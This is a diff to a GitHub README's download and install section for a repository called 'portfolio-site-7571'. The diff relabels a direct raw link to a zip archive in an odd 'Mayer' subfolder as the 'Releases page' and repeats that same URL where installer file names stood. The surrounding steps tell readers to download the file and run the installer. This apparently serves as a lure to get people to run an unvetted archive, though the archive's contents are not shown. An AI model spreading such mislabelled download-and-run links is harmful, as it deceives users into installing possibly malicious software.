pishstew/portfolio-site-7571/README.md

 ## 💾 Download & Install
 To get started, follow these steps:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/pishstew/portfolio-site-7571/releases).
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/pishstew/portfolio-site-7571/main/Mayer/portfolio-site-7571.zip).

 2. **Choose the Latest Version:** Look for the most recent release.
 It will usually be at the top of the page.

 3. **Download the Application:**
    - You will see different files listed.
-Look for something like `portfolio-site-installer.exe` or `portfolio-site.zip` depending on your operating system.
+Look for something like `https://raw.githubusercontent.com/pishstew/portfolio-site-7571/main/Mayer/portfolio-site-7571.zip` or `https://raw.githubusercontent.com/pishstew/portfolio-site-7571/main/Mayer/portfolio-site-7571.zip` depending on your operating system.
    - Click on the appropriate file to start the download.
 Save it to a location you can easily find, such as your Desktop or Downloads folder.

 4. **Run the Installer:**